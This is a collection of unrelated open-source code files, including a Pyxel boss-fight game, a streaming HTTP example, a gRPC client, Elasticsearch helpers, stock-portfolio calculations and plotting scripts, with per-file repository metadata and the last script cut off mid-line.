self.posx + 3 and bullet.posy > self.posy - 3 and bullet.posy < self.posy + 3 and bullet.type != 0: \n if bullet.type == 1:\n self.hp = max(self.hp-1,0)\n elif bullet.type == 2:\n self.hp = max(self.hp-5,0)\n elif bullet.type == 3:\n self.hp = max(self.hp-10,0)\n bullet.alive = False\n\n if not bullet.alive:\n self.bullets.remove(bullet)\n \n for explosion in self.explosions:\n explosion.update()\n if explosion.tick > 8:\n self.explosions.remove(explosion)\n \n if self.scene == 3:\n\n self.name.update()\n\n self.score = [self.name.name,int(3333*self.hp_percent) + int(3333*(1-self.boss.hp_percent)) + int((min(3333*(self.boss.hp_percent == 0),(20*3333)/self.time)))]\n\n if self.score[1] >= self.highscore[1]:\n self.highscore = [self.score[0],max(self.highscore[1],self.score[1])]\n\n self.text_screen = \"You won the battle !\\n\\nHealth left : \" + str(int(self.hp_percent*100)) + \"%\\nHealth boss lost : \" + str(int((1-self.boss.hp_percent)*100)) + \"%\\nTimer : \" + str(self.time) + \" seconds\\n\\nHighscore : \" + str(self.highscore[0]) + \" \" + str(self.highscore[1]) + \"\\nScore : \" + str(int(3333*self.hp_percent)) + \"+\" + str(int(3333*(1-self.boss.hp_percent))) + \"+\" + str(int((min(3333*(self.boss.hp_percent == 0),20000/self.time))))\n\n for button in self.menus[self.scene]:\n button.update(self)\n\n def draw(self):\n\n pyxel.cls(0)\n\n if self.scene == 0:\n pyxel.bltm(0,0,0,0,0,128,128,0)\n\n if self.scene == 1:\n pyxel.bltm(0,0,0,128,0,128,128,0)\n pyxel.text(16,16,self.text_screen,15)\n\n if self.scene == 2 or self.scene == 3:\n for bullet in self.bullets:\n bullet.draw()\n self.boss.draw()\n pyxel.rect(self.posx - 3,self.posy - 3,7,7,1+(12*(self.hp_percent == 0)))\n pyxel.pset(self.posx,self.posy,7)\n if self.scene == 2:\n pyxel.rect(120,2,6,124,13)\n pyxel.rect(120,2+124*(1-self.boss.hp_percent),6,124*self.boss.hp_percent,8)\n pyxel.rect(2,66,6,60,13)\n pyxel.rect(2,66+60*(1-self.hp_percent),6,60*self.hp_percent,11)\n else:\n pyxel.bltm(0,0,0,128,0,128,128,0)\n pyxel.text(16,16,self.text_screen,15)\n pyxel.text(48,96,str(self.score[0])+\" \"+str(self.score[1]),7+(8*int(0.5+((pyxel.frame_count/8)%1))))\n pyxel.text(48,98,str(self.name.selection),7+(8*int(0.5+((pyxel.frame_count/8)%1))))\n\n for explosion in self.explosions:\n explosion.draw()\n\n for button in self.menus[self.scene]:\n button.draw()\n \n def player(self):\n\n self.velx,self.vely = (pyxel.btn(pyxel.KEY_D) - pyxel.btn(pyxel.KEY_Q))/2,(pyxel.btn(pyxel.KEY_S) - pyxel.btn(pyxel.KEY_Z))/2\n \n if pyxel.btn(pyxel.KEY_SPACE) or pyxel.btn(pyxel.MOUSE_BUTTON_RIGHT) or pyxel.btn(pyxel.MOUSE_BUTTON_LEFT):\n \n if pyxel.btn(pyxel.MOUSE_BUTTON_LEFT):\n vector = [pyxel.mouse_x - self.posx,pyxel.mouse_y - self.posy]\n if vector[0] == 0:\n if vector[1] > 0:\n angle = 90\n else:\n angle = 270\n else:\n if vector[1] > 0:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0]))\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n else:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 360\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n \n else:\n vector = [self.boss.posx - self.posx,self.boss.posy - self.posy]\n if vector[0] == 0:\n if vector[1] > 0:\n angle = 90\n else:\n angle = 270\n else:\n if vector[1] > 0:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0]))\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n else:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 360\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n\n if self.shoot_cd == 0:\n pyxel.play(0,1)\n if self.amount_bullet == 1:\n self.bullets += [Bullet(self.posx,self.posy,angle,1,0,0)]\n else:\n for x in range(int(-self.spread/2),int(self.spread/2)+1,int(self.spread/(self.amount_bullet-1))):\n self.bullets += [Bullet(self.posx,self.posy,angle+x,1,0,0)]\n\n self.shoot_cd = 10/self.shoot_rate\n\n if self.posx + self.velx - 3 > 0 and self.posx + self.velx + 3 < 128:\n self.posx = self.posx + self.velx\n if self.posy + self.vely - 3 > 0 and self.posy + self.vely + 3 < 128:\n self.posy = self.posy + self.vely\n self.shoot_cd = max(0,self.shoot_cd - 1)\n self.hp_percent = self.hp/self.hp_max\n\n def death(self):\n\n if self.scene == 2:\n self.deathcd += 1\n if self.deathcd < 20:\n self.explosions += [Explosion(random.uniform(self.posx-6,self.posx+6),random.uniform(self.posy-6,self.posy+6))]\n if self.deathcd >= 30:\n self.bullets = [x for x in self.bullets if x.type != 0]\n self.time = int((pyxel.frame_count - self.time)/60)\n self.scene = 3\n\n\n\nclass Bullet:\n\n def __init__(self,x,y,angle,vel,rot_speed,type):\n \n self.posx,self.posy = x,y\n self.angle = angle\n self.graphic_angle = 0\n self.vel = vel\n self.rot_speed = rot_speed\n self.type = type\n self.alive = True\n\n def update(self):\n\n self.posx,self.posy = self.posx + math.cos(math.radians(self.angle))*self.vel,self.posy + math.sin(math.radians(self.angle))*self.vel\n self.angle += self.rot_speed\n self.graphic_angle += 3\n self.rot_speed = self.rot_speed*0.98\n if self.posx > 192 or self.posx < -64 or self.posy > 192 or self.posy < -64:\n self.alive = False\n\n def draw(self):\n\n if self.type == 0:\n pyxel.circ(self.posx,self.posy,1,10)\n if self.type == 1:\n pyxel.circ(self.posx,self.posy,1,6)\n if self.type == 2:\n triangle(self.posx,self.posy,self.graphic_angle,5,11)\n if self.type == 3:\n square(self.posx,self.posy,self.graphic_angle,4,3)\n\n\n\nclass Boss:\n\n def __init__(self,x,y,hp_percent,rotation_speed, cubes):\n\n self.hp_max = 2000\n self.hp = self.hp_max*hp_percent\n self.hp_percent = hp_percent\n self.speed = 0.5\n self.vel = self.speed\n\n self.posx = x\n self.posy = y\n\n self.cubes = [[Cube(15,1),random.uniform(rotation_speed*0.90,rotation_speed*1.1)*random.choice([-1,1])] for i in range(cubes)]\n self.cubes += [[Cube(25,2),random.uniform(rotation_speed*0.90,rotation_speed*1.1)*random.choice([-1,1])] for i in range(int(cubes/2))]\n\n self.target = [64,64]\n self.pattern = [[64,16]]\n #posx,posy,angle,vel,rot_speed,type,cd,cd_max,spread,amount,spin?\n self.shooting_pattern = []\n if self.hp_percent == 1:\n self.phase = 0\n elif self.hp_percent > 0.75:\n self.phase = 1\n elif self.hp_percent > 0.5:\n self.phase = 2\n elif self.hp_percent > 0.25:\n self.phase = 3\n else:\n self.phase = 4\n\n self.deathcd = 0\n\n def update(self,game):\n\n self.phases()\n self.deplacements(game)\n self.shoot(game)\n self.death(game)\n\n for cube in self.cubes:\n cube[0].update(self.posx,self.posy)\n \n self.hp_percent = self.hp/self.hp_max\n\n def draw(self):\n for cube in self.cubes:\n if self.phase < 6:\n cube[0].anglex += cube[1]\n cube[0].angley += cube[1]\n cube[0].anglez += cube[1]\n else:\n cube[0].color = 13\n cube[0].draw()\n #pyxel.pset(self.posx,self.posy,7)\n #pyxel.pset(*self.target,6)\n \n def deplacements(self,game):\n\n self.patterns(game)\n\n vector = [self.target[0] - self.posx,self.target[1] - self.posy]\n if vector[0] == 0:\n if vector[1] > 0:\n angle = 90\n else:\n angle = 270\n else:\n if vector[1] > 0:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0]))\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n else:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 360\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n\n self.posx += min((math.cos(math.radians(angle))*self.vel, self.target[0] - self.posx),key=lambda x:abs(x))\n self.posy += min((math.sin(math.radians(angle))*self.vel, self.target[1] - self.posy),key=lambda x:abs(x))\n\n def patterns(self,game):\n \n if self.phase == 4:\n self.target = [game.posx,game.posy]\n else:\n self.target = self.pattern[0]\n \n if self.posx == self.target[0] and self.posy == self.target[1]:\n self.pattern.append(self.pattern[0])\n self.pattern.pop(0)\n\n def phases(self):\n\n #shooting pattern : posx,posy,angle,vel,rot_speed,type,cd,cd_max,spread,amount,spin?\n\n if self.phase == 0:\n self.pattern = [[16,16],[112,16]]\n self.shooting_pattern = [[None,None,90,1,0,1,100,20,45,3,False],[0,34,0,1,0,3,0,2,0,1,False],[128,34,180,1,0,3,0,2,0,1,False]]\n self.vel = self.speed\n self.phase = 1\n elif self.phase == 1 and self.hp_percent < 0.75:\n self.pattern = [[64,64]]\n self.shooting_pattern = [[None,None,0,0.5,5,2,100,10,360,3,True],[None,None,0,0.25,0,1,100,100,360,18,False]]\n self.vel = self.speed * 1.5\n self.phase = 2\n elif self.phase == 2 and self.hp_percent < 0.5:\n self.pattern = [[16,16],[112,16],[112,112],[16,112]]\n self.shooting_pattern = [[None,None,0,0.25,0,1,100,100,360,20,True],[None,None,0,0.5,0,2,100,200,360,15,True],[None,None,0,0.75,0,3,100,200,360,10,True]]\n self.vel = self.speed\n self.phase = 3\n elif self.phase == 3 and self.hp_percent < 0.25:\n self.pattern = [[]]\n self.shooting_pattern = [[None,None,0,0.25,0,1,0,100,360,20,True],[None,None,0,0.5,0,2,0,100,360,15,True],[None,None,0,0.75,0,3,0,100,360,10,True]]\n self.vel = self.speed * 0.25\n self.phase = 4\n elif self.phase == 4 and self.hp_percent <= 0:\n self.pattern = [[self.posx,self.posy]]\n self.shooting_pattern = [[]]\n self.phase = 5\n\n def shoot(self,game):\n\n for pattern in self.shooting_pattern:\n bullet = [x for x in pattern]\n if len(bullet) > 0:\n if bullet[0] == None:\n bullet[0] = self.posx\n if bullet[1] == None:\n bullet[1] = self.posy\n\n if bullet[6] == 0:\n if bullet[9] == 1:\n game.bullets += [Bullet(*bullet[0:6])]\n elif bullet[8] == 360:\n for x in range(int(-bullet[8]/2),int(bullet[8]/2)+1,int(bullet[8]/(bullet[9]))):\n game.bullets += [Bullet(*bullet[0:2],bullet[2]+x,*bullet[3:6])]\n else:\n for x in range(int(-bullet[8]/2),int(bullet[8]/2)+1,int(bullet[8]/(bullet[9]-1))):\n game.bullets += [Bullet(*bullet[0:2],bullet[2]+x,*bullet[3:6])]\n\n pattern[6] = bullet[7] * min(0.75 + self.hp_percent,1)\n\n if bullet[10]:\n pattern[2] -= bullet[3]/2 \n pattern[6] = max(0,pattern[6] - 1)\n \n def death(self,game):\n\n if self.phase == 5:\n self.deathcd += 1\n if self.deathcd < 30:\n game.explosions += [Explosion(random.uniform(self.posx-12,self.posx+12),random.uniform(self.posy-12,self.posy+12))]\n if self.deathcd >= 30:\n self.phase = 6\n game.bullets = [x for x in game.bullets if x.type == 0]\n game.time = int((pyxel.frame_count - game.time)/60)\n game.scene = 3\n\n\n\nclass Name:\n\n def __init__(self):\n self.char = [65,65,65]\n self.name = chr(self.char[0]) + chr(self.char[1]) + chr(self.char[2])\n self.selected_char = 0\n self.selection = \" \"\n\n def update(self):\n\n underscore = [\"_ \",\" _ \",\" _\"]\n\n self.name = chr(self.char[0]) + chr(self.char[1]) + chr(self.char[2])\n\n if pyxel.btnp(pyxel.KEY_RIGHT):\n self.selected_char += 1\n if pyxel.btnp(pyxel.KEY_LEFT):\n self.selected_char -= 1\n if self.selected_char > 2:\n self.selected_char = 0 \n if self.selected_char < 0:\n self.selected_char = 2\n\n self.selection = underscore[self.selected_char]\n\n if pyxel.btnp(pyxel.KEY_UP):\n self.char[self.selected_char] += 1\n if pyxel.btnp(pyxel.KEY_DOWN):\n self.char[self.selected_char] -= 1\n for x,char in enumerate(self.char):\n if char > 90:\n self.char[x] = 65 \n if char < 65:\n self.char[x] = 90\n\n\n\nclass Button:\n\n def __init__(self,x,y,text,function):\n self.posx,self.posy = x,y\n self.text = text\n self.function = function\n self.hover = False\n\n def update(self,game):\n self.hover = pyxel.mouse_x > self.posx and pyxel.mouse_x < self.posx + 64 and pyxel.mouse_y > self.posy and pyxel.mouse_y < self.posy + 16\n\n if pyxel.btnp(pyxel.MOUSE_BUTTON_LEFT) and self.hover:\n game.shoot_cd = 10\n self.function()\n\n def draw(self):\n pyxel.blt(self.posx,self.posy,0,0,32+(8*self.hover),64,8,0)\n pyxel.text(self.posx + 10 ,self.posy,self.text,15-(8*self.hover))\n\n\n\nclass Cube:\n\n def __init__(self,size,color):\n\n self.corners = [\n [[-1],[-1],[1]],\n [[1],[-1],[1]],\n [[1],[1],[1]],\n [[-1],[1],[1]],\n [[-1],[-1],[-1]],\n [[1],[-1],[-1]],\n [[1],[1],[-1]],\n [[-1],[1],[-1]]\n ]\n self.anglex = 0\n self.angley = 0\n self.anglez = 0\n self.size = size\n self.color = color\n\n self.posx = 64\n self.posy = 64\n\n def update(self,x,y):\n\n self.posx,self.posy = x,y\n\n \n def draw(self):\n\n rotationx = [\n [1, 0, 0],\n [0, math.cos(math.radians(self.anglex)), -math.sin(math.radians(self.anglex))],\n [0, math.sin(math.radians(self.anglex)), math.cos(math.radians(self.anglex))]\n ]\n rotationy = [\n [math.cos(math.radians(self.angley)), 0, -math.sin(math.radians(self.angley))],\n [0, 1, 0],\n [math.sin(math.radians(self.angley)), 0, math.cos(math.radians(self.angley))]\n ]\n rotationz = [\n [math.cos(math.radians(self.anglez)), -math.sin(math.radians(self.anglez)), 0],\n [math.sin(math.radians(self.anglez)), math.cos(math.radians(self.anglez)), 0],\n [0, 0, 1]\n ]\n figure2d = []\n for corner in self.corners:\n rotated2d = matrix_multiplication(rotationy, corner)\n rotated2d = matrix_multiplication(rotationx, rotated2d)\n rotated2d = matrix_multiplication(rotationz, rotated2d)\n \n distance = 5\n z = 1/(distance - rotated2d[2][0])\n projection_matrix = [\n [z, 0, 0],\n [0, z, 0]\n ]\n projected_2d = matrix_multiplication(projection_matrix, rotated2d)\n\n figure2d += [[int(projected_2d[0][0] * (self.size*2)) + self.posx,int(projected_2d[1][0] * (self.size*2)) + self.posy]]\n\n for k in range(4):\n pyxel.line(*figure2d[k], *figure2d[(k+1)%4],self.color)\n pyxel.line(*figure2d[k + 4], *figure2d[(k+1)%4 +4],self.color)\n pyxel.line(*figure2d[k], *figure2d[k + 4],self.color)\n\n\n\nclass Explosion:\n\n def __init__(self,x,y):\n self.posx,self.posy = x,y\n self.tick = 0\n self.full = random.choice((0,1))\n\n def update(self):\n self.tick += 0.5\n\n def draw(self):\n if self.full:\n pyxel.circ(self.posx,self.posy,self.tick,9+(int(self.tick)%2))\n else:\n pyxel.circb(self.posx,self.posy,self.tick,9+(int(self.tick)%2))\n\n\n\ndef triangle(x,y,angle,size,color):\n\n points = [\n [x + ((size/2) * math.cos(math.radians(angle))),y + ((size/2) * math.sin(math.radians(angle)))],\n [x + ((size/2) * math.cos(math.radians(angle + 120))),y + ((size/2) * math.sin(math.radians(angle + 120)))],\n [x + ((size/2) * math.cos(math.radians(angle + 240))),y + ((size/2) * math.sin(math.radians(angle + 240)))]\n ]\n\n pyxel.trib(*points[0],*points[1],*points[2],color)\n\n\ndef square(x,y,angle,size,color):\n\n points = [\n [x + (((size*math.sqrt(2))/2) * math.cos(math.radians(angle + 45))),y + (((size*math.sqrt(2))/2) * math.sin(math.radians(angle + 45)))],\n [x + (((size*math.sqrt(2))/2) * math.cos(math.radians(angle + 135))),y + (((size*math.sqrt(2))/2) * math.sin(math.radians(angle + 135)))],\n [x + (((size*math.sqrt(2))/2) * math.cos(math.radians(angle + 225))),y + (((size*math.sqrt(2))/2) * math.sin(math.radians(angle + 225)))],\n [x + (((size*math.sqrt(2))/2) * math.cos(math.radians(angle + 315))),y + (((size*math.sqrt(2))/2) * math.sin(math.radians(angle + 315)))]\n ]\n\n pyxel.line(*points[0],*points[1],color)\n pyxel.line(*points[1],*points[2],color)\n pyxel.line(*points[2],*points[3],color)\n pyxel.line(*points[3],*points[0],color)\n\n\ndef matrix_multiplication(a, b):\n columns_a = len(a[0])\n rows_a = len(a)\n columns_b = len(b[0])\n rows_b = len(b)\n\n result_matrix = [[j for j in range(columns_b)] for i in range(rows_a)]\n if columns_a == rows_b:\n for x in range(rows_a):\n for y in range(columns_b):\n sum = 0\n for k in range(columns_a):\n sum += a[x][k] * b[k][y]\n result_matrix[x][y] = sum\n return result_matrix\n\n else:\n return None\n\n\nGame()","repo_name":"Dornf58/ndcbulletnight","sub_path":"Bullet Night.py","file_name":"Bullet Night.py","file_ext":"py","file_size_in_byte":23295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37228202297","text":"import json\nimport requests\n\ns = requests.Session()\n\nr = s.get('http://httpbin.org/stream/20', stream = True)\n# print(r.text)\nprint(r.encoding)\n# print(r.json())\nif r.encoding is None:\n r.encoding = 'utf-8'\n\nfor line in r.iter_lines(decode_unicode=True): # 해당 iterater를 순회하면서 유니코드를 디코딩한다는 뜻\n # print(line) \n b = json.loads(line)\n for e in b.keys():\n print('key:', e, 'values :', b[e])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"seongjae6751/python_web_crawling_section3","sub_path":"3-2-3.py","file_name":"3-2-3.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25554215687","text":"\nimport random\nimport logging\n\nimport grpc\n\nimport mail_pb2 as pb2\nimport mail_pb2_grpc as pb2_grpc\n\n\ndef run():\n with grpc.insecure_channel('localhost:50051') as channel:\n stub = pb2_grpc.SendServiceStub(channel)\n msg = pb2.Mail(content=\"send it\",\n _from=pb2.Person(name=\"hulk\", age=33, weight=84),\n _to=[pb2.Person(name=\"bulk\", age=10, weight=40),\n pb2.Person(name=\"you\", age=20, weight=50)])\n res = stub.SendMessage(msg)\n print(res.content)\n \nif __name__ == '__main__':\n logging.basicConfig()\n run()\n","repo_name":"Hulk89/python_tutorial","sub_path":"grpc_tut/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1001283723","text":"from sqlalchemy import Column, BIGINT, Integer, Float, String, Date, \\\n ForeignKey\nfrom sqlalchemy.orm import backref, relationship \nfrom model.database import Model\n\n\nclass Network(Model):\n __tablename__ = \"network\"\n id = Column(\"id\", Integer, primary_key = True)\n postcode = Column(\"postcode\", String(20))\n avg_download = Column(\"avg_download\", String(20))\n avg_upload = Column(\"avg_upload\", String(20))\n\n def __init__(self, postcode = None, avg_download = None, avg_upload = None, id = None):\n self.id = id\n self.postcode = postcode\n self.avg_download = avg_download\n self.avg_upload = avg_upload","repo_name":"rico3017/opendata","sub_path":"model/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12170201466","text":"# Classification (U)\n\n\"\"\"Program: elastic_libs.py\n\n Description: A library program that contains a number of modules for\n general Elasticsearch database use.\n\n Functions:\n get_latest_dump\n list_dumps\n list_repos2\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\n\n# Local\nimport version\n\n__version__ = version.__version__\n\n\ndef get_latest_dump(dump_list):\n\n \"\"\"Function: get_latest_dump\n\n Description: Return latest dump from a list of dumps based on epoch date.\n\n Arguments:\n (input) dump_list -> List of dumps from a repository.\n (output) Name of latest dump.\n\n \"\"\"\n\n dump_list = list(dump_list)\n last_dump = None\n\n if dump_list:\n search = max([item[4] for item in dump_list])\n\n for item in dump_list:\n if item[4] == search:\n last_dump = item[0]\n break\n\n return last_dump\n\n\ndef list_dumps(dump_list):\n\n \"\"\"Function: list_dumps\n\n Description: Lists the dumps under the current repository.\n\n Arguments:\n (input) dump_list -> List of database dumps.\n\n \"\"\"\n\n dump_list = list(dump_list)\n\n print(\"{0:45} {1:15} {2:10} {3:10} {4:10} {5:5} {6:5}\"\n .format(\"Database Dump Name\", \"Status\", \"Time\", \"Number\",\n \"Shard Information\", \"\", \"\"))\n print(\"{0:45} {1:15} {2:10} {3:10} {4:10} {5:5} {6:5}\"\n .format(\"\", \"\", \"\", \"Indexes\", \"Success\", \"Fail\", \"Total\"))\n\n for item in dump_list:\n print(\"{0:45} {1:15} {2:10} {3:10} {4:10} {5:5} {6:5}\"\n .format(item[0], item[1], item[6], item[7], item[8], item[9],\n item[10]))\n\n\ndef list_repos2(repo_list):\n\n \"\"\"Function: list_repos2\n\n Description: Lists the repositories in the Elasticsearch cluster.\n\n Arguments:\n (input) repo_list -> Dictionary of repositories.\n\n \"\"\"\n\n repo_list = dict(repo_list)\n\n print(\"{0:30} {1}\".format(\"Repository Name\", \"Location\"))\n\n for repo in repo_list:\n print(\"{0:30} {1}\".format(repo,\n repo_list[repo][\"settings\"][\"location\"]))\n","repo_name":"deepcoder42/elastic-lib","sub_path":"elastic_libs.py","file_name":"elastic_libs.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2987813835","text":"import uuid\n\nfrom sqlalchemy import (\n Column,\n ForeignKey,\n)\nfrom sqlalchemy.dialects.postgresql import (\n UUID,\n JSONB,\n)\n\n\nfrom db.base_model import BaseModel\n\n\nclass FolderGroupNameModel(BaseModel):\n __tablename__ = \"folder_group_name\"\n name = Column(JSONB, nullable=False)\n folder_id = Column(UUID(as_uuid=True), ForeignKey(\"folder.id\"), nullable=False)\n","repo_name":"shardbread/home_challenge_clone","sub_path":"app/db/models/group_name.py","file_name":"group_name.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35381990739","text":"from .sraping_yahoo import *\nfrom .get_dolar_price import *\n\ndef calc_lucro(acao, info_das_acoes):\n preco = 0\n ticket = list(acao.keys())[0]\n for x in info_das_acoes:\n if x['acao'] == ticket:\n preco = x['info'][0]['dados']['close']\n quantidade = acao[list((acao.keys()))[0]]['qtd']\n posicao = acao[list((acao.keys()))[0]]['pos']\n lucro = (preco * float(quantidade)) - float(posicao)\n #if acao[list((acao.keys()))[0]]['nacional'] == False:\n # lucro *= get_dolar_price()\n return round(lucro, 2)\n\ndef calculo_patrimonio(acao, lista_info, precos_da_carteira):\n patrimonio = 0\n for y in precos_da_carteira:\n if y['acao'] == acao:\n preco = y['info'][0]['dados']['close']\n patrimonio += float(lista_info[acao]['qtd']) * preco\n return round(patrimonio,2)\n\n\ndef calculo_de_volume(volume_medio,volume_diario,horario_comercial=7,inicio_expediente=10):\n hora_do_dia = int(datetime.now().strftime('%H'))\n minuto_do_dia = int(datetime.now().strftime('%M'))\n if minuto_do_dia > 45:\n hora_do_dia = hora_do_dia + 1\n tempo_de_expediente = hora_do_dia - inicio_expediente\n if 0 > tempo_de_expediente or tempo_de_expediente > horario_comercial:\n tempo_de_expediente = horario_comercial\n #se o dia for sabado ou domingo\n dia_de_hoje = datetime.today().weekday()\n if dia_de_hoje >= 5:\n tempo_de_expediente = horario_comercial\n volume_medio_por_hora = int(round(volume_medio / horario_comercial,0))\n volume_medio_do_dia = volume_medio_por_hora * tempo_de_expediente\n if volume_diario != 0:\n porcentagem_diferenca = round(((volume_diario / volume_medio_do_dia)-1) * 100,1)\n else:\n porcentagem_diferenca = 0\n dict_volume = {'volume':volume_diario,\n 'dados':{'avg_vol':volume_medio,\n 'high':'none',\n 'percent':porcentagem_diferenca}}\n\n if volume_diario > volume_medio_do_dia:\n dict_volume['dados']['high'] = True\n else:\n dict_volume['dados']['high'] = False\n return dict_volume\n\ndef correcao_carteira_com_peso(portfolio, patrimonio):\n patrimonio_total = patrimonio['patrimonio']['patrimonio_total']['pos']\n lista_retorno = []\n for x in portfolio:\n acao = list(x.keys())[0]\n if acao == 'caixa':\n posicao = round((float(x[acao]['pos']) / patrimonio_total * 100),1)\n x[acao]['peso'] = posicao\n if acao != 'caixa':\n if x[acao]['nacional'] == True:\n posicao = round((float(x[acao]['posicao_atual']) / patrimonio_total * 100),1)\n retorno_total = round((float(x[acao]['lucro']) / patrimonio_total) * 100,1) \n x[acao]['peso'] = posicao\n x[acao]['retorno_no_patrimonio'] = retorno_total\n else:\n posicao = round(((float(x[acao]['posicao_atual']) * get_dolar_price()) / patrimonio_total * 100),1)\n retorno_total = round((float(x[acao]['lucro']) / patrimonio_total * 100),1)\n x[acao]['peso'] = posicao\n x[acao]['retorno_no_patrimonio'] = retorno_total\n lista_retorno.append(x)\n return lista_retorno\n","repo_name":"ribeirosaimon/Planilha_Django","sub_path":"carteira/calculos/lucro.py","file_name":"lucro.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38904206862","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mtick\nimport csv\n\nrehash = []\ncount = []\npercent_count = [] # % of buckets rehashed to specific count\ncumulative = [] # number of buckets rehashed at each round\npercent_cumu = [] # % of buckets rehashed at round\n\nwith open('../csv/cert_rehash.csv') as file:\n reader = csv.DictReader(file, delimiter=',')\n for row in reader:\n rehash.append(int(row['rehashes per bucket']))\n count.append(int(row[' count']))\n\nprint(rehash)\n# rehash.pop(0)\n# count.pop(0)\nprint(count)\nprint(sum(count))\n\nfor i in range(0, len(count)):\n c_sum = 0\n percent_count.append(count[i] * 100 / sum(count))\n if i == 0:\n continue\n for j in range(i, len(count)):\n c_sum += count[j]\n percent_cumu.append(c_sum * 100 / sum(count))\n cumulative.append(c_sum)\n\nprint(percent_count)\nprint(cumulative)\npercent_cumu.insert(0, 0)\nprint(percent_cumu)\n\n# fig = plt.figure()\nfig, ax = plt.subplots()\n# rehash.pop(0)\nplt.bar(rehash, percent_cumu, color='y', label='cumulative')\nplt.bar(rehash, percent_count, label='specific count')\nplt.plot(loc = \"upper right\")\nplt.xlabel(\"Rehash Count\")\nplt.ylabel(\"Frequency out of Total Buckets\")\nplt.title(\"Bucket Rehashing Frequency Distribution\")\nax.yaxis.set_major_formatter(mtick.PercentFormatter())\nax.legend()\n\n\n\"\"\"\nax2 = ax.twinx()\nax2.bar(rehash, count)\nax2.set_ylabel(\"Frequency\")\n\n# xlocs, xlabs = plt.xticks()\nax.yaxis.set_major_formatter(mtick.PercentFormatter())\n\"\"\"\n\nplt.grid(True)\nplt.show()\nfig.savefig(\"../figures/cert_rehash.png\")\n\nexit()\n","repo_name":"mwong775/filters-project","sub_path":"scripts/cuckoo_old/fp_rehash.py","file_name":"fp_rehash.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23633240891","text":"import numpy as np\nimport h5py\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches as mpatches\nimport matplotlib.lines as mlines\nimport argparse\nfrom matplotlib import gridspec\n\n\nheights = np.arange(0, 15000)\n\ncloud_phases = [\n 'ice',\n 'mixed',\n 'water'\n]\n\nphase_colors = [\n '#b0d5ff',\n '#59aaff',\n '#0075f3'\n]\n\nphase_linestyle = [\n 'dotted',\n 'dashdot',\n 'dashed'\n]\n\n\ndef plot_main(f):\n h = len(heights)\n total = f['cloud_incidence_total'][()]\n\n left = np.zeros(h, dtype=np.double)\n for i in reversed(range(len(cloud_phases))):\n cloud_incidence_p = np.sum(\n 1.0*f['cloud_incidence_by_type_phase'][:, :, i],\n axis=1\n )/total\n plt.fill_betweenx(\n heights/1000.0,\n left,\n left + cloud_incidence_p*100.0,\n facecolor=phase_colors[i],\n lw=0,\n edgecolor='#002254'\n )\n left += cloud_incidence_p*100.0\n\n plt.xlabel('Frequency (%)')\n plt.ylabel('Height (km)')\n plt.xlim(0, 45)\n plt.ylim(0, 15)\n plt.xticks(plt.xticks()[0][:-1])\n\n plt.grid()\n\n legend = plt.legend(handles=[\n mpatches.Patch(label=cloud_phases[i], facecolor=phase_colors[i], edgecolor='#002254', lw=0.5)\n for i in range(len(cloud_phases))\n ])\n legend.get_frame().set_linewidth(0.8)\n\n\ndef plot_side(f):\n total = f['cloud_incidence_total'][()]\n\n for i in reversed(range(len(cloud_phases))):\n cloud_incidence_p = np.sum(\n 1.0*f['cloud_incidence_by_type_phase'][:, :, i],\n axis=1\n )/total\n plt.plot(\n cloud_incidence_p*100.0,\n heights/1000.0,\n color='#002254',\n linestyle=phase_linestyle[i],\n lw=1.5\n )\n\n plt.xlim(0, 35)\n plt.ylim(0, 15)\n plt.xlabel('Frequency (%)')\n plt.gca().yaxis.set_ticklabels([])\n plt.grid()\n\n legend = plt.legend(handles=\n [\n mlines.Line2D([], [], linestyle=phase_linestyle[i], label=cloud_phases[i], color='#002254', lw=1.5)\n for i in range(len(cloud_phases))\n ]\n )\n legend.get_frame().set_linewidth(0.8)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Plot cloud incidence by phase')\n parser.add_argument('file', type=str, help='HDF5 input file')\n parser.add_argument('-o', dest='outfile', type=str, help='output plot')\n parser.add_argument('-t', dest='title', type=str, help='plot title', default='')\n\n args = parser.parse_args()\n\n with h5py.File(args.file) as f:\n plt.rcParams['font.family'] = 'Open Sans'\n plt.suptitle(args.title, fontsize=14)\n\n gs = gridspec.GridSpec(1, 